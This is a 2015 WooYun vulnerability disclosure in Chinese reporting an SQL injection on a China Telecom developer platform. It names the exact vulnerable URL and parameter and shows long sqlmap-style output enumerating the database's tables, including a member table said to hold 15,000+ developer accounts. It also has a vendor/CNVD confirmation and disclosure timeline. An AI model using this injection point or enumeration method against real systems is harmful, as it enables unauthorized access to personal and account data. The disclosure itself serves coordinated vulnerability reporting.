当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125778

漏洞标题:运营商安全之中国电信某开放平台SQL注入漏洞(涉及1.5W+开发者账号详细信息含账号密码\邮箱\账户金额等)

相关厂商:中国电信

漏洞作者: 管管侠

提交时间:2015-07-09 21:47

修复时间:2015-08-27 15:04

公开时间:2015-08-27 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

有人问我,只看联通、移动?管管你找不到电信的高危漏洞?
cncert评运营商的rank总是不高,不够客观。
声明:脱库的事我干不出来,不要找我。

详细说明:

http://open.189.cn/index.php?a=index&c=viewallability&m=api&id=3413
id是注入点

a1.png


a2.png


[21:14:46] [INFO] fetching tables for database: 'emp'
[21:14:46] [INFO] fetching number of tables for database 'emp'
[21:14:46] [INFO] resumed: 1027
[21:14:46] [INFO] resumed: emp_ability
[21:14:46] [INFO] resumed: emp_ability_api
[21:14:46] [INFO] resumed: emp_ability_api_rp
[21:14:46] [INFO] resumed: emp_ability_api_statistics
[21:14:46] [INFO] resumed: emp_ability_category
[21:14:46] [INFO] resumed: emp_ability_collection
[21:14:46] [INFO] resumed: emp_ability_dev
[21:14:46] [INFO] resumed: emp_ability_new
[21:14:46] [INFO] resumed: emp_ability_rp
[21:14:46] [INFO] resumed: emp_ability_sendchannel_change_log
[21:14:46] [INFO] resumed: emp_ability_sync_temp
[21:14:46] [INFO] resumed: emp_ability_sync_temp_log
[21:14:46] [INFO] resumed: emp_ability_tag
[21:14:46] [INFO] resumed: emp_ability_unifyability
[21:14:46] [INFO] resumed: emp_ability_version
[21:14:46] [INFO] resumed: emp_access_ip
[21:14:46] [INFO] resumed: emp_access_token
[21:14:46] [INFO] resumed: emp_account_info_request
[21:14:46] [INFO] resumed: emp_agreement
[21:14:46] [INFO] resumed: emp_agreement_contract
[21:14:46] [INFO] resumed: emp_api
[21:14:46] [INFO] resumed: emp_api_access_history
[21:14:46] [INFO] resumed: emp_api_admin_edit_log
[21:14:46] [INFO] resumed: emp_api_param
[21:14:46] [INFO] resumed: emp_api_rp
[21:14:46] [INFO] resumed: emp_api_statistics
[21:14:46] [INFO] resumed: emp_api_test_config
[21:14:46] [INFO] resumed: emp_api_vote
[21:14:46] [INFO] resumed: emp_app_ability
[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_logger
[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_temp
[21:14:46] [INFO] resumed: emp_app_ability_rp
[21:14:46] [INFO] resumed: emp_app_accounting_agreement
[21:14:46] [INFO] resumed: emp_app_api_call_log
[21:14:46] [INFO] resumed: emp_app_api_success_call
[21:14:46] [INFO] resumed: emp_app_at_sync_temp
[21:14:46] [INFO] resumed: emp_app_billing_black_list
[21:14:46] [INFO] resumed: emp_app_billing_cdma_code
[21:14:46] [INFO] resumed: emp_app_billing_month_accounting
[21:14:46] [INFO] resumed: emp_app_channel
[21:14:46] [INFO] resumed: emp_app_device_sync_temp
[21:14:46] [INFO] resumed: emp_app_device_sync_temp_logger
[21:14:46] [INFO] resumed: emp_app_ep_op_history
[21:14:46] [INFO] resumed: emp_app_ep_op_reason_history
[21:14:46] [INFO] resumed: emp_app_hot
[21:14:46] [INFO] resumed: emp_app_ims_url
[21:14:46] [INFO] resumed: emp_app_info
[21:14:46] [INFO] resumed: emp_app_info_history
[21:14:46] [INFO] resumed: emp_app_info_rp
[21:14:46] [INFO] resumed: emp_app_info_sync_logger
[21:14:46] [INFO] resumed: emp_app_info_sync_temp
[21:14:46] [INFO] resumed: emp_app_message_sync_logger
[21:14:46] [INFO] resumed: emp_app_message_sync_temp
[21:14:46] [INFO] resumed: emp_app_phone_white_list
[21:14:46] [INFO] resumed: emp_app_sdk
[21:14:46] [INFO] resumed: emp_app_sms_spread_code
[21:14:46] [INFO] resumed: emp_app_spread
[21:14:46] [INFO] resumed: emp_app_struct_tags
[21:14:46] [INFO] resumed: emp_app_tags
[21:14:46] [INFO] resumed: emp_app_testing_audit
[21:14:46] [INFO] resumed: emp_app_version
[21:14:46] [INFO] resumed: emp_app_white_list
[21:14:46] [INFO] resumed: emp_attachament_ref
[21:14:46] [INFO] resumed: emp_authorization_code
[21:14:46] [INFO] resumed: emp_authorization_remove_log
[21:14:46] [INFO] resumed: emp_authorization_sync_logger
[21:14:46] [INFO] resumed: emp_authorization_sync_temp
[21:14:46] [INFO] resumed: emp_authorize_request
[21:14:46] [INFO] resumed: emp_authorize_traffic
[21:14:46] [INFO] resumed: emp_bestpay_order
[21:14:46] [INFO] resumed: emp_billing
[21:14:46] [INFO] resumed: emp_billing_app_white_list
[21:14:46] [INFO] resumed: emp_billing_limit
[21:14:46] [INFO] resumed: emp_billing_order_relation
[21:14:46] [INFO] resumed: emp_billing_order_relation_log
[21:14:46] [INFO] resumed: emp_billing_phone_limit
[21:14:46] [INFO] resumed: emp_billing_price_auth
[21:14:46] [INFO] resumed: emp_billing_price_config
[21:14:46] [INFO] resumed: emp_billing_push
[21:14:46] [INFO] resumed: emp_billing_push_log
[21:14:46] [INFO] resumed: emp_billing_sms_received_notify
[21:14:46] [INFO] resumed: emp_billing_sms_result
[21:14:46] [INFO] resumed: emp_billing_sms_sending
[21:14:46] [INFO] resumed: emp_billing_token
[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_logger
[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_temp
[21:14:46] [INFO] resumed: emp_cdma_code
[21:14:46] [INFO] resumed: emp_cdma_code2
[21:14:46] [INFO] resumed: emp_cloudycode_from_source
[21:14:46] [INFO] resumed: emp_cloudyserver
[21:14:46] [INFO] resumed: emp_cloudyserver_history
[21:14:46] [INFO] resumed: emp_cloudyserver_recycle
[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data
[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data_back
[21:14:46] [INFO] resumed: emp_cms_ability_sdk_api_count
[21:14:46] [INFO] resumed: emp_cms_admin
[21:14:46] [INFO] resumed: emp_cms_admin_panel
[21:14:46] [INFO] resumed: emp_cms_admin_role
[21:14:46] [INFO] resumed: emp_cms_admin_role_priv
[21:14:46] [INFO] resumed: emp_cms_admin_role_ref
[21:14:46] [INFO] resumed: emp_cms_announce
[21:14:46] [INFO] resumed: emp_cms_api
[21:14:46] [INFO] resumed: emp_cms_api_data
[21:14:46] [INFO] resumed: emp_cms_app_recommend
[21:14:46] [INFO] resumed: emp_cms_attachment
[21:14:46] [INFO] resumed: emp_cms_attachment_index
[21:14:46] [INFO] resumed: emp_cms_audit_msg_fav
[21:14:46] [INFO] resumed: emp_cms_badword
[21:14:46] [INFO] resumed: emp_cms_cache
[21:14:46] [INFO] resumed: emp_cms_category
[21:14:46] [INFO] resumed: emp_cms_category_priv
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_appadd
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_dispatchlist
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_modelgetspecimens
[21:14:46] [INFO] resumed: emp_cms_comment
[21:14:46] [INFO] resumed: emp_cms_comment_check
[21:14:46] [INFO] resumed: emp_cms_comment_data_1
[21:14:46] [INFO] resumed: emp_cms_comment_setting
[21:14:46] [INFO] resumed: emp_cms_comment_table
[21:14:46] [INFO] resumed: emp_cms_content_check
[21:14:46] [INFO] resumed: emp_cms_copyfrom
[21:14:46] [INFO] resumed: emp_cms_email
[21:14:46] [INFO] resumed: emp_cms_email_queue
[21:14:46] [INFO] resumed: emp_cms_email_template
[21:14:46] [INFO] resumed: emp_cms_extend_setting
[21:14:46] [INFO] resumed: emp_cms_favorite
[21:14:46] [INFO] resumed: emp_cms_form_open_sign
[21:14:46] [INFO] resumed: emp_cms_hits
[21:14:46] [INFO] resumed: emp_cms_invcode
[21:14:46] [INFO] resumed: emp_cms_invcode_type
[21:14:46] [INFO] resumed: emp_cms_ipbanned
[21:14:46] [INFO] resumed: emp_cms_keylink
[21:14:46] [INFO] resumed: emp_cms_link
[21:14:46] [INFO] resumed: emp_cms_linkage
[21:14:46] [INFO] resumed: emp_cms_log
[21:14:46] [INFO] resumed: emp_cms_member
[21:14:46] [INFO] resumed: emp_cms_member_company
[21:14:46] [INFO] resumed: emp_cms_member_detail
[21:14:46] [INFO] resumed: emp_cms_member_enabler
[21:14:46] [INFO] resumed: emp_cms_member_enabler_rp
[21:14:46] [INFO] resumed: emp_cms_member_free_times
[21:14:46] [INFO] resumed: emp_cms_member_group
[21:14:46] [INFO] resumed: emp_cms_member_hand_package
[21:14:46] [INFO] resumed: emp_cms_member_hand_package_data
[21:14:46] [INFO] resumed: emp_cms_member_hand_package_log
[21:14:46] [INFO] resumed: emp_cms_member_invite
[21:14:46] [INFO] resumed: emp_cms_member_menu
[21:14:46] [INFO] resumed: emp_cms_member_package
[21:14:46] [INFO] resumed: emp_cms_member_package_sync_logger
[21:14:46] [INFO] resumed: emp_cms_member_package_sync_temp
[21:14:46] [INFO] resumed: emp_cms_member_send_mark
[21:14:46] [INFO] resumed: emp_cms_member_verify
[21:14:46] [INFO] resumed: emp_cms_member_vip
[21:14:46] [INFO] resumed: emp_cms_menu
[21:14:46] [INFO] resumed: emp_cms_message
[21:14:46] [INFO] resumed: emp_cms_message_category
[21:14:46] [INFO] resumed: emp_cms_message_conversation
[21:14:46] [INFO] resumed: emp_cms_message_data
[21:14:46] [INFO] resumed: emp_cms_message_group
[21:14:46] [INFO] resumed: emp_cms_model
[21:14:46] [INFO] resumed: emp_cms_model_field
[21:14:46] [INFO] resumed: emp_cms_module
[21:14:46] [INFO] resumed: emp_cms_news
[21:14:46] [INFO] resumed: emp_cms_news_data
[21:14:46] [INFO] resumed: emp_cms_open
[21:14:46] [INFO] resumed: emp_cms_open_data
[21:14:46] [INFO] resumed: emp_cms_open_star
[21:14:46] [INFO] resumed: emp_cms_package_order_change_log
[21:14:46] [INFO] resumed: emp_cms_page
[21:14:46] [INFO] resumed: emp_cms_page_log
[21:14:46] [INFO] resumed: emp_cms_pay_account
[21:14:46] [INFO] resumed: emp_cms_pay_coupon
[21:14:46] [INFO] resumed: emp_cms_pay_coupon_code
[21:14:46] [INFO] resumed: emp_cms_pay_package
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_dedicated
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_sender_info
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_tmp
[21:14:46] [INFO] resumed: emp_cms_pay_package_order
[21:14:46] [INFO] resumed: emp_cms_pay_package_order_data
[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_logger
[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_temp
[21:14:46] [INFO] resumed: emp_cms_pay_payment
[21:14:46] [INFO] resumed: emp_cms_pay_spend
[21:14:46] [INFO] resumed: emp_cms_plugin
[21:14:46] [INFO] resumed: emp_cms_plugin_var
[21:14:46] [INFO] resumed: emp_cms_position
[21:14:46] [INFO] resumed: emp_cms_position_data
[21:14:46] [INFO] resumed: emp_cms_poster
[21:14:46] [INFO] resumed: emp_cms_poster_201506
[21:14:46] [INFO] resumed: emp_cms_poster_201507
[21:14:46] [INFO] resumed: emp_cms_poster_space
[21:14:46] [INFO] resumed: emp_cms_print_invoice_sender_log
[21:14:46] [INFO] resumed: emp_cms_queue
[21:14:46] [INFO] resumed: emp_cms_release_point
[21:14:46] [INFO] resumed: emp_cms_search
[21:14:46] [INFO] resumed: emp_cms_search_keyword
[21:14:46] [INFO] resumed: emp_cms_session
[21:14:46] [INFO] resumed: emp_cms_site
[21:14:46] [INFO] resumed: emp_cms_sms_report
[21:14:46] [INFO] resumed: emp_cms_sphinx_counter
[21:14:46] [INFO] resumed: emp_cms_suggestion
[21:14:46] [INFO] resumed: emp_cms_template_bak
[21:14:46] [INFO] resumed: emp_cms_times
[21:14:46] [INFO] resumed: emp_cms_type
[21:14:46] [INFO] resumed: emp_cms_urlrule
[21:14:46] [INFO] resumed: emp_cms_workflow
[21:14:46] [INFO] resumed: emp_contract_info
[21:14:46] [INFO] resumed: emp_contract_info_in_template
[21:14:46] [INFO] resumed: emp_d_20130724
[21:14:46] [INFO] resumed: emp_d_20130725
[21:14:46] [INFO] resumed: emp_d_20130726
[21:14:46] [INFO] resumed: emp_d_20130727
[21:14:46] [INFO] resumed: emp_d_20130728
[21:14:46] [INFO] resumed: emp_d_20130729
[21:14:46] [INFO] resumed: emp_d_20130730
[21:14:46] [INFO] resumed: emp_d_20130731
[21:14:46] [INFO] resumed: emp_d_20130801
[21:14:46] [INFO] resumed: emp_d_20130802
[21:14:46] [INFO] resumed: emp_d_20130803
[21:14:46] [INFO] resumed: emp_d_20130804
[21:14:46] [INFO] resumed: emp_d_20130805
[21:14:46] [INFO] resumed: emp_d_20130806
[21:14:46] [INFO] resumed: emp_d_20130807
[21:14:46] [INFO] resumed: emp_d_20130808
[21:14:46] [INFO] resumed: emp_d_20130809
[21:14:46] [INFO] resumed: emp_d_20130810
[21:14:46] [INFO] resumed: emp_d_20130811
[21:14:46] [INFO] resumed: emp_d_20130812
[21:14:46] [INFO] resumed: emp_d_20130813
[21:14:46] [INFO] resumed: emp_d_20130814
[21:14:46] [INFO] resumed: emp_d_20130815
[21:14:46] [INFO] resumed: emp_d_20130816
[21:14:46] [INFO] resumed: emp_d_20130817
[21:14:46] [INFO] resumed: emp_d_20130818
[21:14:46] [INFO] resumed: emp_d_20130819
[21:14:46] [INFO] resumed: emp_d_20130820
[21:14:46] [INFO] resumed: emp_d_20130821
[21:14:46] [INFO] resumed: emp_d_20130822
[21:14:46] [INFO] resumed: emp_d_20130823
[21:14:46] [INFO] resumed: emp_d_20130824
[21:14:46] [INFO] resumed: emp_d_20130825
[21:14:46] [INFO] resumed: emp_d_20130826
[21:14:46] [INFO] resumed: emp_d_20130827
[21:14:46] [INFO] resumed: emp_d_20130828
[21:14:46] [INFO] resumed: emp_d_20130829
[21:14:46] [INFO] resumed: emp_d_20130830
[21:14:46] [INFO] resumed: emp_d_20130831
[21:14:46] [INFO] resumed: emp_d_20130901
[21:14:46] [INFO] resumed: emp_d_20130902
[21:14:46] [INFO] resumed: emp_d_20130903
[21:14:46] [INFO] resumed: emp_d_20130904
[21:14:46] [INFO] resumed: emp_d_20130905
[21:14:46] [INFO] resumed: emp_d_20130906
[21:14:46] [INFO] resumed: emp_d_20130907
[21:14:46] [INFO] resumed: emp_d_20130908
[21:14:46] [INFO] resumed: emp_d_20130909
[21:14:46] [INFO] resumed: emp_d_20130910
[21:14:46] [INFO] resumed: emp_d_20130911
[21:14:46] [INFO] resumed: emp_d_20130912
[21:14:46] [INFO] resumed: emp_d_20130913
[21:14:46] [INFO] resumed: emp_d_20130914
[21:14:46] [INFO] resumed: emp_d_20130915
[21:14:46] [INFO] resumed: emp_d_20130916
[21:14:46] [INFO] resumed: emp_d_20130917
[21:14:46] [INFO] resumed: emp_d_20130918
[21:14:46] [INFO] resumed: emp_d_20130919
.......


表太多,读不完,算了,找到了表:emp_cms_member

a4.png

漏洞证明:

q5.png


涉及万款左右的应用,危害还是蛮大的

修复方案:

再次声明:这1.5w+的开发者数据仅读取了4条作危害证明

版权声明:转载请注明来源 管管侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-13 15:02

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无